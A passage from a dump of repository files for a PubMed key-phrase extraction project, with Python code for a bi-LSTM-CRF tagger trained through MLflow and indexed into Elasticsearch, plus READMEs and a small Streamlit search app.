return field_val if not pd.isna(field_val) else 1900\n TEXT = torchtext.data.Field(init_token='<bos>', eos_token='<eos>', sequential=True, lower=False)\n LABEL = torchtext.data.Field(init_token='<bos>', eos_token='<eos>', sequential=True, unk_token=None)\n fields = [('text', TEXT), ('label', LABEL)]\n device = 'cuda'\n train_examples = read_data(df_train, fields, tokenizersrc, tokenizertrg)\n valid_examples = read_data(df_val, fields, tokenizersrc, tokenizertrg)\n # Load the pre-trained embeddings that come with the torchtext library.\n if use_pretrained:\n print('We are using pre-trained word embeddings.')\n TEXT.build_vocab(train_examples, vectors=embvec)\n else: \n print('We are training word embeddings from scratch.')\n TEXT.build_vocab(train_examples, max_size=5000)\n LABEL.build_vocab(train_examples)\n # Create one of the models defined above.\n #self.model = RNNTagger(self.TEXT, self.LABEL, emb_dim=300, rnn_size=128, update_pretrained=False)\n model0 = RNNCRFTagger(TEXT, LABEL, rnnsize, emb_dim=300, update_pretrained=False)\n\n model0.to(device)\n optimizer = torch.optim.Adam(model0.parameters(), lr=lr, weight_decay=weight_decay)\n with mlflow.start_run() as mlrun:\n train(train_examples, valid_examples, embvec, TEXT, LABEL, device, model0, batchsize, optimizer,n_epochs)\n out2 = evaltest2(df_val, df_val_k, model0, tokenizersrc, fields, device)\n ttp3 = kphperct(df_val_k, out2,svoc)\n mlflow.log_param(\"epochs\", n_epochs)\n mlflow.pytorch.save_model(model0, model_save)\n mlflow.log_metric(\"extraction_rate\", ttp3.mean())\n augout = evaltest2(dataiu,model0, tokenizersrc, fields, device)\n klist = kphext2(dataiu.SRC,augout,svoc)\n for i in range(len(dataiu.index)):\n dataiu.iloc[i,2].extend(list(set(klist[i])))\n output = pd.concat([dataik,dataiu], join=\"inner\")\n output.to_json('/home/pding/OneDrive/kph/MSaug.json', orient='index')\n if es == 1:\n output['journal'] = output['journal'].apply(safe_value)\n output['conclusions'] = output['conclusions'].apply(safe_value)\n output['pubdate'] = output['pubdate'].apply(safe_year)\n output['PMID'] = output.index\n test_server = [{'host':'127.0.0.1','port':9200}]\n es = Elasticsearch(test_server,http_compress=True)\n use_these_keys = ['PMID', 'title', 'abstract', 'keywords','authors','pubdate']\n\n def filterKeys(document):\n return {key: document[key] for key in use_these_keys }\n \n def doc_generator(df):\n df_iter = df.iterrows()\n for index, document in df_iter:\n try:\n yield {\n \"_index\": 'ms',\n \"_source\": filterKeys(document),\n }\n except StopIteration:\n return\n helpers.bulk(es, doc_generator(output))\n print(ttp3.mean())\n\n\nclass RNNCRFTagger(nn.Module):\n \n def __init__(self, text_field, label_field, rnn_size, emb_dim, update_pretrained=False):\n super().__init__()\n \n voc_size = len(text_field.vocab)\n self.n_labels = len(label_field.vocab) \n \n self.embedding = nn.Embedding(voc_size, emb_dim)\n if text_field.vocab.vectors is not None:\n self.embedding.weight = torch.nn.Parameter(text_field.vocab.vectors, \n requires_grad=update_pretrained)\n\n self.rnn = nn.LSTM(input_size=emb_dim, hidden_size=rnn_size, \n bidirectional=True, num_layers=1)\n\n self.top_layer = nn.Linear(2*rnn_size, self.n_labels)\n \n self.pad_word_id = text_field.vocab.stoi[text_field.pad_token]\n self.pad_label_id = label_field.vocab.stoi[label_field.pad_token]\n \n self.crf = CRF(self.n_labels)\n \n def compute_outputs(self, sentences):\n embedded = self.embedding(sentences)\n rnn_out, _ = self.rnn(embedded)\n out = self.top_layer(rnn_out)\n return out\n \n def forward(self, sentences, labels):\n # Compute the outputs of the lower layers, which will be used as emission\n # scores for the CRF.\n scores = self.compute_outputs(sentences)\n mask0 = sentences != self.pad_word_id\n mask = mask0.byte()\n # We return the loss value. The CRF returns the log likelihood, but we return \n # the *negative* log likelihood as the loss value. \n # PyTorch's optimizers *minimize* the loss, while we want to *maximize* the\n # log likelihood.\n return -self.crf(scores, labels, mask=mask)\n\n def predict(self, sentences):\n # Compute the emission scores, as above.\n scores = self.compute_outputs(sentences)\n mask0 = sentences != self.pad_word_id\n mask = mask0.byte()\n # Apply the Viterbi algorithm to get the predictions. This implementation returns\n # the result as a list of lists (not a tensor), corresponding to a matrix\n # of shape (n_sentences, max_len).\n return self.crf.decode(scores, mask=mask)\n\ndef train(train_examples, valid_examples, embvec, TEXT, LABEL, device, model, batch_size, optimizer, n_epochs):\n\n\n # Count the number of words and sentences.\n n_tokens_train = 0\n n_sentences_train = 0\n for ex in train_examples:\n n_tokens_train += len(ex.text) + 2\n n_sentences_train += 1\n n_tokens_valid = 0 \n for ex in valid_examples:\n n_tokens_valid += len(ex.text)\n\n\n \n n_batches = np.ceil(n_sentences_train / batch_size)\n\n mean_n_tokens = n_tokens_train / n_batches\n\n train_iterator = torchtext.data.BucketIterator(\n train_examples,\n device=device,\n batch_size=batch_size,\n sort_key=lambda x: len(x.text),\n repeat=False,\n train=True,\n sort=True)\n\n valid_iterator = torchtext.data.BucketIterator(\n valid_examples,\n device=device,\n batch_size=64,\n sort_key=lambda x: len(x.text),\n repeat=False,\n train=False,\n sort=True)\n\n train_batches = list(train_iterator)\n valid_batches = list(valid_iterator)\n\n n_labels = len(LABEL.vocab)\n\n history = defaultdict(list) \n\n \n\n for i in range(1, n_epochs + 1):\n\n t0 = time.time()\n\n loss_sum = 0\n\n model.train()\n for batch in train_batches:\n\n # Compute the output and loss.\n loss = model(batch.text, batch.label) / mean_n_tokens\n\n optimizer.zero_grad() \n loss.backward()\n optimizer.step()\n loss_sum += loss.item()\n\n train_loss = loss_sum / n_batches\n history['train_loss'].append(train_loss)\n if i % 1 == 0:\n print(f'Epoch {i}: train loss = {train_loss:.4f}')\n mlflow.log_metric(\"train_loss\", history['train_loss'])\n\n\ndef evaltest2(df_val, df_val_k, model, tokenizersrc,fields,device):\n # This method applies the trained model to a list of sentences.\n examples = []\n for sen in df_val.SRC:\n words = tokenizersrc(sen)\n labels = ['O']*len(words) # placeholder\n examples.append(torchtext.data.Example.fromlist([words, labels], fields))\n dataset = torchtext.data.Dataset(examples, fields)\n\n iterator = torchtext.data.Iterator(\n dataset,\n device=device,\n batch_size=300,\n repeat=False,\n train=False,\n sort=False)\n\n # Apply the trained model to all batches.\n out = []\n model.eval()\n for batch in iterator:\n # Call the model's predict method. This returns a list of NumPy matrix\n # containing the integer-encoded tags for each sentence.\n predicted = model.predict(batch.text)\n\n # Convert the integer-encoded tags to tag strings.\n #for tokens, pred_sen in zip(sentences, predicted):\n for pred_sen in predicted:\n out.append([LABEL.vocab.itos[pred_id] for pred_id in pred_sen[1:-1]])\n return out\n\n\n\ndef kphext2(sentences,tags,svoc):\n kph = []\n for i in range(len(sentences)):\n s0 = svoc.tokenizer(sentences[i])\n s1 = [tok.text for tok in s0]\n t1 = tags[i]\n k1 = []\n for j in range(len(s1)):\n start = j\n if t1[j] == 'B':\n sti = 0\n stop = j+1\n while sti == 0:\n try:\n kt = str(t1[stop])\n if kt == 'I':\n stop = stop+1\n else:\n k2 = str(s0[start:stop])\n k1.append(k2)\n sti = 1\n except(IndexError):\n k2 = str(s0[start:stop])\n k1.append(k2)\n sti = 1\n k2 = str(s1[j])\n kph.append(k1)\n return kph\n\n\ndef read_data(df_train, datafields, tokenizersrc, tokenizertrg):\n examples = []\n words = []\n labels = []\n for pmid in df_train.index:\n words = tokenizersrc(df_train.loc[pmid,'SRC'])\n labels = tokenizertrg(df_train.loc[pmid,'TRG'])\n examples.append(torchtext.data.Example.fromlist([words, labels], datafields))\n return torchtext.data.Dataset(examples, datafields)\n\ndef tagperct(df_val,out):\n tp = np.empty(len(out))\n for i in range(len(df_val.index)):\n trg = tokenizertrg(df_val.iloc[i,1])\n total = 0\n for x in trg:\n if x != 'O':\n total = total+1\n matched = 0\n for j in range(total):\n if trg[j] != 'O':\n if trg[j]== out[i][j]:\n matched = matched + 1\n p = matched/total\n tp[i] = p\n return tp\n\n\ndef kphperct(df_val_k,out,svoc):\n tp = np.empty(len(out))\n for i in range(len(df_val_k.index)):\n ktrg = df_val_k.iloc[i,2]\n pred = kphext2([df_val_k.iloc[i,0]],[out[i]],svoc)\n k = 0\n for kp in ktrg:\n if str(kp).lower() in [str(x).lower() for x in pred[0]]:\n k = k+1\n tp[i] = k/df_val_k.iloc[i,3]\n return tp\n\n\nif __name__ == '__main__':\n ketraintest()\n"
},
{
"alpha_fraction": 0.7607170939445496,
"alphanum_fraction": 0.7700701355934143,
"avg_line_length": 46.51852035522461,
"blob_id": "71351249a1001d5e21d00a32d100ac3af1b48885",
"content_id": "55809bd4c03f61b43bf2257507dc1bb3dd4b7edc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1283,
"license_type": "no_license",
"max_line_length": 249,
"num_lines": 27,
"path": "/mlflow/README.md",
"repo_name": "pchding/kph",
"src_encoding": "UTF-8",
"text": "# End-to-end Key Phrase Extraction Model powered by MLflow\n\nThere are three modules in this model:\n1. pull_pmed_data: it pulls all the records related to the defined search term from PubMed and save them in a JSON file\n2. prep_data: it cleans the records and genertate the tag seauence for future training.\n3. ke_train: it uses the cleanned sequence with key phrases to train a bi-LSTM-CRF model and then use this model to augment the records without key phrases with extracted key phrases. It could also write these records into an ELasticsearch database.\n\n## Running the model\n\nMake sure you have installed MLflow package in your python environment. Download all the files, then go to the mlflow folder.\n\nTo run each module, exectute the following command to pull pubmed data using parameter defined in the input file (input.txt)\n```\nmlflow run . -e pull_pmed_data -P inputfile=1\n```\nSubstitute 'pull_pmed_data' to any other modules, if you do not want use the inputfile and want set paramters through command line, you could execute something the following command\n```\nmlflow run . -e pull_pmed_data -P inputfile=0 -P search_term='covid' -P max_records=100000\n```\n\nTo run the whole end-to-end model\n\n```\nmlflow run . -e main -P inputfile=1\n```\n\nSample input.txt is also included.\n"
},
{
"alpha_fraction": 0.5518254041671753,
"alphanum_fraction": 0.5589593052864075,
"avg_line_length": 38.71666717529297,
"blob_id": "8b26fdd95d5e34f3158726b1a6201f8c8cb25e29",
"content_id": "cdecd299f65d97f1f84cbd0ee9e86cdddf2355c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2383,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 60,
"path": "/mlflow/dataprep.py",
"repo_name": "pchding/kph",
"src_encoding": "UTF-8",
"text": "import mlflow\nimport click\nimport spacy\nfrom spacy.matcher import PhraseMatcher\nimport pandas as pd\nimport subprocess\nimport ast\n\n\[email protected](help=\"Convert JSON to PD. Tag key phrases\")\[email protected](\"--json_in\", default='pmed.json')\[email protected](\"--save_df\", default='dfprocessed.p')\[email protected](\"--inputfile\", default=1,\n help=\"Whether to use the input.txt\")\ndef dfprep(json_in, save_df, inputfile):\n if inputfile == 1:\n with open(\"input.txt\", \"r\") as f:\n para = ast.literal_eval(f.read())\n json_in = para['json_in']\n save_df = para['save_df']\n with mlflow.start_run() as mlrun:\n print(subprocess.getoutput(\"python -m spacy download en_core_web_sm\"))\n artpd = pd.read_json(json_in, orient='index', convert_dates=False, convert_axes=False)\n artpda = artpd[artpd.abstract.notnull()].copy()\n artpda = artpda[artpd.title.notnull()]\n# artpda.index = pd.Series(artpda.index).apply(lambda x: x[0:8])\n artpdak = artpda[artpda.keywords.str.len() > 0].copy()\n dataf = pd.DataFrame(index=artpdak.index, columns=['SRC', 'TRG', 'keywords', 'Extracted', 'abskey'])\n dataf.loc[:, 'SRC'] = artpdak.title + ' ' + artpdak.abstract\n dataf.loc[:, 'keywords'] = artpdak.keywords\n svoc = spacy.load(\"en_core_web_sm\")\n matcher = PhraseMatcher(svoc.vocab, attr=\"LOWER\")\n for pmid in dataf.index:\n t0 = dataf.loc[pmid]\n patterns = [svoc.make_doc(str(name)) for name in t0.keywords]\n matcher.add(\"Names\", None, *patterns)\n doc = svoc(t0.SRC)\n t1 = ['O']*(len(doc))\n matched = []\n matn = 0\n for _, start, end in matcher(doc):\n t1[start] = 'B'\n t1[start+1:end] = 'I'*(end-start-1)\n if str(doc[start:end]).lower() not in matched:\n matn = matn+1\n matched.append(str(doc[start:end]).lower())\n abskw = []\n for x in t0.keywords:\n if x.lower() not in matched:\n abskw.append(x)\n dataf.loc[pmid, 'TRG'] = ' '.join([t for t in t1])\n dataf.loc[pmid, 'Extracted'] = matn\n dataf.loc[pmid, 'abskey'] = abskw\n matcher.remove(\"Names\")\n dataf.to_pickle(save_df)\n\n\n\nif __name__ == '__main__':\n dfprep()\n"
},
{
"alpha_fraction": 0.8137931227684021,
"alphanum_fraction": 0.8166666626930237,
"avg_line_length": 132.76922607421875,
"blob_id": "4790f079b9aeef9196a77ead4912d74ac7c0d966",
"content_id": "680675fc99edbcde8e3b343bd284badd59819185",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1744,
"license_type": "no_license",
"max_line_length": 495,
"num_lines": 13,
"path": "/README.md",
"repo_name": "pchding/kph",
"src_encoding": "UTF-8",
"text": "# Key phrase extraction for scientific literature\n\nThis repo contains the end-to-end model for extracting key phrases from the records on PubMed in the mlflow folder. MLflow contain four modules that will execute the following four functions\n1. Collect records from PubMed with “search term”\n2. Preprocessing (generate tag sequence, extracting training dataset)\n3. Train model on the training set, report validation results\n4. Use trained model to extract keyphrases from records outside of training. Depending on the configuration, either store the records with extracted keyphrases in a JSON file, or push the records to the configured elasticsearch/kibana backend\n\nPlease be noted, the PubMed API wrapper has several unfixed bugs, MLflow has been configured to install an unofficial version published at https://github.com/iacopy/pymed/tree/fork-fixes. \n\nAnother part of the project involves building an elasticsearch/kibana backend and build a clio-lite powered contexual search engine on it. The docker-compose file for setting up the server and the code for building clio-lite based search engine (the official version of clio-lite does not support Elasticsearch version 7+ at the time, so an unofficial version at https://github.com/inactivist/clio-lite/tree/bugfix/fix-typeerror-basic-usage is used). You can find related files in the es folder.\n\nNotebooks used during the experimentation phase are included in the notebooks folder. You can find both LSTM and LSTM-crf models there. A different crf model that includes a context windows to explicitly consider the effects from nearby words is also in that folder, although this model does not perform better than the LSTM-CRF model (since LSTM already encompass this information).\n\n"
},
{
"alpha_fraction": 0.6740666031837463,
"alphanum_fraction": 0.6861755847930908,
"avg_line_length": 40.29166793823242,
"blob_id": "3a2c10312feab23a4041c62fcdb2a46862be5bbd",
"content_id": "453d3fc67f9ee4cf2bf909ab52bb5064d3f65b14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 991,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 24,
"path": "/es/cliosearch.py",
"repo_name": "pchding/kph",
"src_encoding": "UTF-8",
"text": "from clio_lite import clio_search,clio_search_iter,clio_keywords\nimport streamlit as st\n# To make things easier later, we're also importing numpy and pandas for\n# working with sample data.\nimport pandas as pd\n\n\nst.title('Contextual Search for Multiple Sclerosis Records on PubMed')\nindex = st.text_input('Database for search', 'ms')\nquery = st.text_input('Search term', 'muitiple sclerosis')\nmaxr = st.text_input('max results', 25)\nurl = \"http://127.0.0.1:9200\"\nseoptions = st.multiselect(\n 'Which fileds to search?',\n [\"title\", \"abstract\", 'keywords'])\ntotal, docs = clio_search(url=url, index=index, query=query, fields=seoptions, limit=maxr)\nkeywords = clio_keywords(url=url, index=index, query=query,\n fields=seoptions,\n )\nst.markdown('Relted Key Phrases:')\nklist = ', '.join([kw['key'] for kw in keywords])\nst.text(klist)\nst.markdown('Results Table')\nst.table(pd.DataFrame(docs, columns=['PMID', 'title', 'keywords', 'pubdate']))\n"
},
{
"alpha_fraction": 0.5533769130706787,
"alphanum_fraction": 0.5627221465110779,
"avg_line_length": 37.082969665527344,
"blob_id": "4c015623f177fe2f8c86b9c0d69ae9d80f6e4f37",
"content_id": "05907b783a089926fbb472da598c8987beafd652",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17442,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 458,
"path": "/mlflow/main.py",
"repo_name": "pchding/kph",
"src_encoding": "UTF-8",
"text": "from pymed import PubMed\nimport mlflow\nfrom collections import defaultdict\nimport json\nimport ast\nimport spacy\nfrom spacy.matcher import PhraseMatcher\nimport pandas as pd\nimport torch\nfrom torch import nn\nimport time\nimport torchtext\nimport numpy as np\nfrom torchcrf import CRF\nimport subprocess\nimport mlflow.pytorch\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch import helpers\n\n\[email protected](\"--search_term\", default='test',\n help=\"https://pubmed.ncbi.nlm.nih.gov/advanced/\")\[email protected](\"--max_records\", default=10000,\n help=\"Limit the data size to run comfortably.\")\[email protected](\"--json_out\", default='pmed.json',\n help=\"Name of the output JSON file\")\[email protected](\"--embvec\", default=1)\[email protected](\"--embvecache\", default='/home/pding/Documents/glove/')\[email protected](\"--val_ratio\", default=0.2)\[email protected](\"--rnnsize\", default=128)\[email protected](\"--batchsize\", default=310)\[email protected](\"--lr\", default=0.01)\[email protected](\"--weight_decay\", default=1e-5)\[email protected](\"--n_epochs\", default=15)\[email protected](\"--model_save\", default='model0.pt')\[email protected](\"--es\", default=1)\[email protected](\"--inputfile\", default=1,\n help=\"Whether to use the input.txt\")\ndef mainpipe(inputfile, search_term, max_records, json_out, embvec, embvecache, val_ratio, rnnsize, batchsize,lr, weight_decay, n_epochs, model_save, es):\n if inputfile == 1:\n with open(\"input.txt\", \"r\") as f:\n para = ast.literal_eval(f.read())\n search_term = para['search_term']\n max_records = para['max_records']\n embvec = para['embvec']\n embvecache = para['embvecache']\n val_ratio = para['val_ratio']\n rnnsize = para['rnnsize']\n batchsize = para['batchsize']\n lr = para['lr']\n weight_decay = para['weight_decay']\n n_epochs = para['n_epochs']\n model_save = para['model_save']\n if embvec == 1:\n embvec = torchtext.vocab.GloVe(name='840B', dim=300, cache=embvecache)\n use_pretrained = True\n with mlflow.start_run() as mlrun:\n pubmed = PubMed(tool=\"AlphabetH\", email=\"[email protected]\")\n query = search_term\n results = pubmed.query(query, max_results=max_records)\n pp = defaultdict(lambda: defaultdict(dict))\n for art in results:\n pmed = art.pubmed_id\n try:\n pp[pmed]['title'] = art.title\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['abstract'] = art.abstract\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['abstract'] = pp[pmed]['abstract'] + art.conclusions\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['abstract'] = pp[pmed]['abstract'] + art.methods\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['abstract'] = pp[pmed]['abstract'] + art.results\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['keywords'] = art.keywords\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['authors']= art.authors\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['journal'] = art.journal\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['pubdate'] = str(art.publication_date.year)\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['conclusions'] = art.conclusions\n except(AttributeError, TypeError):\n pass\n print(subprocess.getoutput(\"python -m spacy download en_core_web_sm\"))\n artpd = pd.DataFrame.from_dict(pp, orient='index')\n artpda = artpd[artpd.abstract.notnull()].copy()\n artpda = artpda[artpd.title.notnull()]\n# artpda.index = pd.Series(artpda.index).apply(lambda x: x[0:8])\n artpdak = artpda[artpda.keywords.str.len() > 0].copy()\n dataf = pd.DataFrame(index=artpdak.index, columns=['SRC', 'TRG', 'keywords', 'Extracted', 'abskey'])\n dataf.loc[:, 'SRC'] = artpdak.title + ' ' + artpdak.abstract\n dataf.loc[:, 'keywords'] = artpdak.keywords\n svoc = spacy.load(\"en_core_web_sm\")\n matcher = PhraseMatcher(svoc.vocab, attr=\"LOWER\")\n for pmid in dataf.index:\n t0 = dataf.loc[pmid]\n patterns = [svoc.make_doc(str(name)) for name in t0.keywords]\n matcher.add(\"Names\", None, *patterns)\n doc = svoc(t0.SRC)\n t1 = ['O']*(len(doc))\n matched = []\n matn = 0\n for _, start, end in matcher(doc):\n t1[start] = 'B'\n t1[start+1:end] = 'I'*(end-start-1)\n if str(doc[start:end]).lower() not in matched:\n matn = matn+1\n matched.append(str(doc[start:end]).lower())\n abskw = []\n for x in t0.keywords:\n if x.lower() not in matched:\n abskw.append(x)\n dataf.loc[pmid, 'TRG'] = ' '.join([t for t in t1])\n dataf.loc[pmid, 'Extracted'] = matn\n dataf.loc[pmid, 'abskey'] = abskw\n matcher.remove(\"Names\")\n datatrain = dataf[dataf['Extracted']>=3].copy()\n datatest = dataf[dataf['Extracted']<3].copy()\n # separate train and validate\n dtrain = datatrain.loc[:,['SRC','TRG']]\n dtraink = datatrain.loc[:,['SRC','TRG','keywords']]\n seed = 250\n idx = np.arange(datatrain.shape[0])\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n np.random.shuffle(idx)\n val_size = int(len(idx) * val_ratio)\n df_train = dtrain.iloc[idx[val_size:], :]\n df_val = dtrain.iloc[idx[:val_size], :]\n df_val_k = dtraink.iloc[idx[:val_size], :]\n df_test = datatest.loc[:,['SRC','TRG']]\n dtraink = datatrain.loc[:,['SRC','TRG','keywords']]\n df_val_k = dtraink.iloc[idx[:val_size], :]\n # Load original dataset\n datai = artpda.copy()\n datai = datai[datai.abstract.notnull()]\n datai = datai[datai.title.notnull()]\n datai = datai.replace('\\n',' ', regex=True)\n datai = datai.replace('\\t',' ', regex=True)\n dataiu = datai.loc[datai.keywords.str.len() ==0]\n dataik = datai.loc[datai.keywords.str.len() >0]\n dataiu['SRC'] = dataiu.title + ' '+ dataiu.abstract\n tokenizertrg = lambda x: x.split()\n\n def tokenizersrc(text): # create a tokenizer function\n return [tok.text for tok in svoc.tokenizer(text)]\n def safe_value(field_val):\n return field_val if not pd.isna(field_val) else \"Other\"\n def safe_year(field_val):\n return field_val if not pd.isna(field_val) else 1900\n TEXT = torchtext.data.Field(init_token='<bos>', eos_token='<eos>', sequential=True, lower=False)\n LABEL = torchtext.data.Field(init_token='<bos>', eos_token='<eos>', sequential=True, unk_token=None)\n fields = [('text', TEXT), ('label', LABEL)]\n device = 'cuda'\n train_examples = read_data(df_train, fields, tokenizersrc, tokenizertrg)\n valid_examples = read_data(df_val, fields, tokenizersrc, tokenizertrg)\n # Load the pre-trained embeddings that come with the torchtext library.\n if use_pretrained:\n print('We are using pre-trained word embeddings.')\n TEXT.build_vocab(train_examples, vectors=embvec)\n else: \n print('We are training word embeddings from scratch.')\n TEXT.build_vocab(train_examples, max_size=5000)\n LABEL.build_vocab(train_examples)\n # Create one of the models defined above.\n #self.model = RNNTagger(self.TEXT, self.LABEL, emb_dim=300, rnn_size=128, update_pretrained=False)\n model0 = RNNCRFTagger(TEXT, LABEL, rnnsize, emb_dim=300, update_pretrained=False)\n\n model0.to(device)\n optimizer = torch.optim.Adam(model0.parameters(), lr=lr, weight_decay=weight_decay)\n train(train_examples, valid_examples, embvec, TEXT, LABEL, device, model0, batchsize, optimizer,n_epochs)\n out2 = evaltest2(df_val, df_val_k, model0, tokenizersrc, fields, device)\n ttp3 = kphperct(df_val_k, out2,svoc)\n mlflow.log_param(\"epochs\", n_epochs)\n mlflow.pytorch.save_model(model0, model_save)\n mlflow.log_metric(\"extraction_rate\", ttp3.mean())\n augout = evaltest2(dataiu,model0, tokenizersrc, fields, device)\n klist = kphext2(dataiu.SRC,augout,svoc)\n for i in range(len(dataiu.index)):\n dataiu.iloc[i,2].extend(list(set(klist[i])))\n output = pd.concat([dataik,dataiu], join=\"inner\")\n output.to_json('/home/pding/OneDrive/kph/MSaug.json', orient='index')\n if es == 1:\n output['journal'] = output['journal'].apply(safe_value)\n output['conclusions'] = output['conclusions'].apply(safe_value)\n output['pubdate'] = output['pubdate'].apply(safe_year)\n output['PMID'] = output.index\n test_server = [{'host':'127.0.0.1','port':9200}]\n es = Elasticsearch(test_server,http_compress=True)\n use_these_keys = ['PMID', 'title', 'abstract', 'keywords','authors','pubdate']\n\n def filterKeys(document):\n return {key: document[key] for key in use_these_keys }\n \n def doc_generator(df):\n df_iter = df.iterrows()\n for index, document in df_iter:\n try:\n yield {\n \"_index\": 'ms',\n \"_source\": filterKeys(document),\n }\n except StopIteration:\n return\n helpers.bulk(es, doc_generator(output))\n print(ttp3.mean())\n\n\n\nclass RNNCRFTagger(nn.Module):\n \n def __init__(self, text_field, label_field, rnn_size, emb_dim, update_pretrained=False):\n super().__init__()\n \n voc_size = len(text_field.vocab)\n self.n_labels = len(label_field.vocab) \n \n self.embedding = nn.Embedding(voc_size, emb_dim)\n if text_field.vocab.vectors is not None:\n self.embedding.weight = torch.nn.Parameter(text_field.vocab.vectors, \n requires_grad=update_pretrained)\n\n self.rnn = nn.LSTM(input_size=emb_dim, hidden_size=rnn_size, \n bidirectional=True, num_layers=1)\n\n self.top_layer = nn.Linear(2*rnn_size, self.n_labels)\n \n self.pad_word_id = text_field.vocab.stoi[text_field.pad_token]\n self.pad_label_id = label_field.vocab.stoi[label_field.pad_token]\n \n self.crf = CRF(self.n_labels)\n \n def compute_outputs(self, sentences):\n embedded = self.embedding(sentences)\n rnn_out, _ = self.rnn(embedded)\n out = self.top_layer(rnn_out)\n return out\n \n def forward(self, sentences, labels):\n # Compute the outputs of the lower layers, which will be used as emission\n # scores for the CRF.\n scores = self.compute_outputs(sentences)\n mask0 = sentences != self.pad_word_id\n mask = mask0.byte()\n # We return the loss value. The CRF returns the log likelihood, but we return \n # the *negative* log likelihood as the loss value. \n # PyTorch's optimizers *minimize* the loss, while we want to *maximize* the\n # log likelihood.\n return -self.crf(scores, labels, mask=mask)\n\n def predict(self, sentences):\n # Compute the emission scores, as above.\n scores = self.compute_outputs(sentences)\n mask0 = sentences != self.pad_word_id\n mask = mask0.byte()\n # Apply the Viterbi algorithm to get the predictions. This implementation returns\n # the result as a list of lists (not a tensor), corresponding to a matrix\n # of shape (n_sentences, max_len).\n return self.crf.decode(scores, mask=mask)\n\ndef train(train_examples, valid_examples, embvec, TEXT, LABEL, device, model, batch_size, optimizer, n_epochs):\n\n\n # Count the number of words and sentences.\n n_tokens_train = 0\n n_sentences_train = 0\n for ex in train_examples:\n n_tokens_train += len(ex.text) + 2\n n_sentences_train += 1\n n_tokens_valid = 0 \n for ex in valid_examples:\n n_tokens_valid += len(ex.text)\n\n\n \n n_batches = np.ceil(n_sentences_train / batch_size)\n\n mean_n_tokens = n_tokens_train / n_batches\n\n train_iterator = torchtext.data.BucketIterator(\n train_examples,\n device=device,\n batch_size=batch_size,\n sort_key=lambda x: len(x.text),\n repeat=False,\n train=True,\n sort=True)\n\n valid_iterator = torchtext.data.BucketIterator(\n valid_examples,\n device=device,\n batch_size=64,\n sort_key=lambda x: len(x.text),\n repeat=False,\n train=False,\n sort=True)\n\n train_batches = list(train_iterator)\n valid_batches = list(valid_iterator)\n\n n_labels = len(LABEL.vocab)\n\n history = defaultdict(list) \n\n \n\n for i in range(1, n_epochs + 1):\n\n t0 = time.time()\n\n loss_sum = 0\n\n model.train()\n for batch in train_batches:\n\n # Compute the output and loss.\n loss = model(batch.text, batch.label) / mean_n_tokens\n\n optimizer.zero_grad() \n loss.backward()\n optimizer.step()\n loss_sum += loss.item()\n\n train_loss = loss_sum / n_batches\n history['train_loss'].append(train_loss)\n if i % 1 == 0:\n print(f'Epoch {i}: train loss = {train_loss:.4f}')\n mlflow.log_metric(\"train_loss\", history['train_loss'])\n\n\ndef evaltest2(df_val, df_val_k, model, tokenizersrc,fields,device):\n # This method applies the trained model to a list of sentences.\n examples = []\n for sen in df_val.SRC:\n words = tokenizersrc(sen)\n labels = ['O']*len(words) # placeholder\n examples.append(torchtext.data.Example.fromlist([words, labels], fields))\n dataset = torchtext.data.Dataset(examples, fields)\n\n iterator = torchtext.data.Iterator(\n dataset,\n device=device,\n batch_size=300,\n repeat=False,\n train=False,\n sort=False)\n\n # Apply the trained model to all batches.\n out = []\n model.eval()\n for batch in iterator:\n # Call the model's predict method. This returns a list of NumPy matrix\n # containing the integer-encoded tags for each sentence.\n predicted = model.predict(batch.text)\n\n # Convert the integer-encoded tags to tag strings.\n #for tokens, pred_sen in zip(sentences, predicted):\n for pred_sen in predicted:\n out.append([LABEL.vocab.itos[pred_id] for pred_id in pred_sen[1:-1]])\n return out\n\n\n\ndef kphext2(sentences,tags,svoc):\n kph = []\n for i in range(len(sentences)):\n s0 = svoc.tokenizer(sentences[i])\n s1 = [tok.text for tok in s0]\n t1 = tags[i]\n k1 = []\n for j in range(len(s1)):\n start = j\n if t1[j] == 'B':\n sti = 0\n stop = j+1\n while sti == 0:\n try:\n kt = str(t1[stop])\n if kt == 'I':\n stop = stop+1\n else:\n k2 = str(s0[start:stop])\n k1.append(k2)\n sti = 1\n except(IndexError):\n k2 = str(s0[start:stop])\n k1.append(k2)\n sti = 1\n k2 = str(s1[j])\n kph.append(k1)\n return kph\n\n\ndef read_data(df_train, datafields, tokenizersrc, tokenizertrg):\n examples = []\n words = []\n labels = []\n for pmid in df_train.index:\n words = tokenizersrc(df_train.loc[pmid,'SRC'])\n labels = tokenizertrg(df_train.loc[pmid,'TRG'])\n examples.append(torchtext.data.Example.fromlist([words, labels], datafields))\n return torchtext.data.Dataset(examples, datafields)\n\ndef tagperct(df_val,out):\n tp = np.empty(len(out))\n for i in range(len(df_val.index)):\n trg = tokenizertrg(df_val.iloc[i,1])\n total = 0\n for x in trg:\n if x != 'O':\n total = total+1\n matched = 0\n for j in range(total):\n if trg[j] != 'O':\n if trg[j]== out[i][j]:\n matched = matched + 1\n p = matched/total\n tp[i] = p\n return tp\n\n\ndef kphperct(df_val_k,out,svoc):\n tp = np.empty(len(out))\n for i in range(len(df_val_k.index)):\n ktrg = df_val_k.iloc[i,2]\n pred = kphext2([df_val_k.iloc[i,0]],[out[i]],svoc)\n k = 0\n for kp in 